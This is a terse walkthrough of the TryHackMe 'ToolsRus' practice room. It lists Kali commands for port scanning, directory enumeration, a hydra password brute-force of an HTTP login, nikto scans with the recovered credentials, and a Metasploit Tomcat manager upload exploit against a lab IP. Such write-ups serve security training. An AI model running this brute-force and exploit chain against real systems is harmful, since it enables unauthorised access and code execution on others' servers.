ToolsRus

Room Link: https://tryhackme.com/room/toolsrus

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

hydra -l bob -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top1000.txt $VICTIM http-get /protected

Kali

nikto -id bob:bubbles -h http://$VICTIM:80/manager/html

Kali

nikto -id bob:bubbles -h http://$VICTIM:1234/manager/html 

Kali

msfconsole 

Msfconsole

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 10.10.98.194
set RPORT 1234
set HttpUsername bob
set HttpPassword bubbles
run